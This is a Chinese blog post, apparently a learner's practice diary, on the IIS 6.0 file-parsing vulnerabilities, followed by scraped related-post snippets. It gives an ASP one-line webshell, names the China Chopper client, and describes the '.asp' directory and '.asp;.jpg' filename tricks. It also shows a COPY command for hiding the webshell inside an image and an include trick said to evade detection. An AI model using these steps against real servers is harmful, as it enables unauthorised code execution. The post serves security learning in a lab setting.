1. 程式人生 > >初窺滲透--IIS6.0解析漏洞

初窺滲透--IIS6.0解析漏洞

    學滲透一定要動手操作,一個簡單的動作重複N遍以上就能學會了。

    最近在學習一句話木馬的使用,加上中國菜刀,真是個居家旅行的必備技能。舉例說asp的一句話:

<%execute request(chr(97))%>

a就是連線密碼了。(一定要寫對chr(97),我看著書寫char(97)被坑了一下午...還以為是伺服器設定問題)。但是今天我練習的時候遇到了只能上傳圖片的漏洞,然後就去網上找姿勢,就學習了IIS6.0的解析漏洞了。

我的練習環境是windows 2003的IIS6.0,這個版本有兩個解析漏洞:

1、在網站目錄中如果存在名為*.asp、*.asa的目錄,那該目錄內的任何檔案都會被IIS解析為asp檔案並執行。

2、在上傳圖片木馬的時候,將檔名改為*.asp;.jpg,該檔案檔案都會被IIS解析為asp檔案並執行。

第一個漏洞測試成功了,在網站目錄下建立了一個1.asp目錄,在目錄下上傳了內容為<%execute request(chr(97))%>但檔名為cmd.jpg的”影象“檔案,用菜刀成功連線。

第二個漏洞同理,不同的只是之間建立一個同樣內容的cmd.asp;.jpg檔案。

至於製作asp圖片木馬,今天學到了一個copy拼接的方法:

準備一張圖片(儘可能小點吧,10k左右?對載入應該有影響),命名為1.jpg

寫asp一句話木馬,命名為1.asp

開啟cmd,執行COPY 1.jpg /b + 1.asp /a asp.jpg拼接得到asp.jpg即時asp圖片木馬了。【/b表示指定一個二進位制檔案,/a表示指定一個ASCII檔案】

可以再建立一個asp.asp檔案,內容為<!-- #include file="asp.jpg"-->,放在同一個目錄下,聽說可以繞過檢測。明天試一下~~~

相關推薦

滲透--IIS6.0解析漏洞

    學滲透一定要動手操作,一個簡單的動作重複N遍以上就能學會了。     最近在學習一句話木馬的使用,加上中國菜刀,真是個居家旅行的必備技能。舉例說asp的一句話: <%execute request(chr(97))%> a就是連線密碼了。(一定要寫對ch

IIS6.0解析漏洞

執行 bsp 裏的 clas cer 默認 兩種 gpo iis6 IIS6.0解析漏洞分兩種 1、目錄解析 以*.asp命名的文件夾裏的文件都將會被當成ASP文件執行。 2、文件解析 *.asp;.jpg 像這種畸形文件名在“;”後面的直接被忽略,也就是說當成 *.a

滲透記錄——iis7.5漏洞沒有iis6解析漏洞

拿到一個後臺,剛開始不讓傳馬,apsx偽裝成jpg,提示安全錯誤,含有html編碼,看來必須要用正常圖片。於是找了小圖片,用copy /b d:\aa.jpg+d:\xiaoma.aspx  luo2.jpg  ,如圖 合成了一個含馬的正常圖片(注意順序:圖片+馬是修改檔

IIS6目錄解析漏洞的實驗

​​​​​​​​​​Windows 開啟IIS管理器的方式 這個是網站IIS網站目錄 右擊預設網站中的屬性,可以檢視網站的屬性,比如網站根目錄,或者是埠 這個是網站的目錄C:\www,有三個檔案分別是file資料夾,index.asp,upload.asp。其中 Index.a

i春秋:警惕IIS6.0站上的解析缺陷繞過上傳漏洞

防禦方案 1.客戶端檢測,使用JS對上傳圖片檢測,包括檔案大小、副檔名、檔案型別等 2.服務端檢測,對檔案大小、檔案路徑、副檔名、檔案型別、檔案內容檢測,對檔案重新命名 3.其他限制,伺服器端上傳目錄設定不可執行許可權

滲透課程】第六篇-上傳漏洞解析漏洞

文件的 配置文件 密碼 3.1 安裝目錄 ppa xxx 表單 圖片 上傳漏洞,我們為什麽要上傳?因為我們說過。在網站服務器上 肯定有一個Web容器,它裏面裝的就是Web應用程序 。某些腳本具有一定的執行和修改權限。這些權限可以說是服務器給客戶端訪問時提供的服務的同時提供的

Hadoop-0.20.2原始碼學習(1)——原始碼

參考: JeffreyZhou的部落格園 《Hadoop權威指南》第四版 0. 為什麼選擇0.20.2版本 前面學習搭建的Hadoop版本是2.7.6,可是這裡為什麼要學習0.20.2這麼老的版本呢?

CVE-2017-7269 IIS6.0遠端程式碼執行漏洞分析及Exploit

原帖地址:http://whereisk0shl.top/cve-2017-7269-iis6-interesting-exploit.html 感謝仙果和Wingdbg,我將我部落格的這篇分析轉到看雪和大家一起分享。我的部落格會長期更新二進位制分析的文章,希望能與

IIS 6.0/7.0/7.5、Nginx、Apache 等Web Service解析漏洞總結 Apache解析漏洞詳解

[+]IIS 6.0 目錄解析:/xx.asp/xx.jpg  xx.jpg可替換為任意文字檔案(e.g. xx.txt),文字內容為後門程式碼 IIS6.0 會將 xx.jpg 解析為 asp 檔案。 字尾解析:/xx.asp;.jpg     /xx

如何解決IIS6.0目錄檢查漏洞的問題

一、Windows2003EnterpriseEditionIIS6目錄檢查漏洞的描述 1、Windows2003EnterpriseEdition是微軟目前主流的伺服器作業系統。Windows2003IIS6存在著檔案解析路徑的漏洞,當資料夾名為類似hack.ASP的時候(即資料夾名看

ReactiveCocoa 3.0

本篇博文介紹了 ReactiveCocoa 3.0 (以下簡稱 RC)全新的 Swift 介面,包括泛型,操作符以及柯里化函式的有趣用法。 這是我為 RC3 系列準備的第一篇文章。這篇文章主要的側重點是介紹 Swift 版本的 Signal 類,在下一期文章中我會展示一個更完整

Android框架之路——Retrofit2.0(包含Gson)

參考部落格: 實現效果:        使用姿勢:    1. 使用教程 新增依賴 compile ‘com.squareup.retrofit2:retrofit:2.2.0’ compile ‘com.squareup.retr

IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞總結

[+]IIS 6.0 目錄解析:/xx.asp/xx.jpg  xx.jpg可替換為任意文字檔案(e.g. xx.txt),文字內容為後門程式碼 IIS6.0 會將 xx.jpg 解析為 asp 檔案。 字尾解析:/xx.asp;.jpg     /xx.asp:.jpg

CVE-2017-7269淺析-IIS6.0棧溢位漏洞

本文轉載自 CVE-2017-7269:IIS6.0遠端程式碼執行漏洞原理分析 CVE-2017-7269:IIS6.0遠端程式碼執行漏洞分析及Exploit vmware安裝Windows Server 2003 R2 Enterprise Editio

CVE-2017-7269 IIS6.0遠端程式碼執行漏洞復現

CVE-2017-7269 IIS6.0遠端程式碼執行漏洞復現 一、漏洞描述 IIS 6.0預設不開啟WebDAV,一旦開啟了WebDAV,安裝了IIS6.0的伺服器將可能受到該漏洞的威脅。 二、影響版本以及利用條件 Windows 2003 R2開啟WebDAV服務的IIS6.0 三、漏洞環境搭建

Ansible API 2.0解析

ansibleimport json from collections import namedtuple from ansible.parsing.dataloader import DataLoader from ansible.vars import VariableManager from ansib

在Windows Server 2003 的IIS6.0發布網站出現401錯誤

401錯誤在IIS 6.0 裏面 發布網站,瀏覽網頁的時出現 “您未被授權查看該頁” HTTP 錯誤 401.1 - 未經授權:訪問由於憑據無效被拒絕。猜想是匿名用戶沒有開放。 右擊 我的電腦—管理—本地用戶和組—找到IUSER_計算機名 這個用戶,右擊屬性 ,可以看到“帳號已禁用”被勾選,去掉勾即可。重

ElasticSearch

下載 json數據包 com function learn 按順序 模糊搜索 搜索範圍 last 初窺ElasticSearch 官網上面的,不知道講的是什麽。。 youtube上面有一個start with,內容是在windows以下跑這個

文件解析漏洞匯總

host tro apach handle nat 文件合並 常用 com href 解析漏洞正如其名,一般大家常說的是,文件在某種格式下,會被執行為該腳本語言的文件。 文件上傳漏洞通常與Web容器的解析漏洞配合利用 常見Web容器有IIS、Nginx、Apache、To

項目構建

修改 時間短 團隊 程序 快速 是什麽 新的 頻率 cat 原文出自: http://www.cnblogs.com/Ribbon/archive/2015/05/22/4517125.html 1.項目構建基本流程 開發人員在他們的個人計算機上編寫源代碼文件 他們將編寫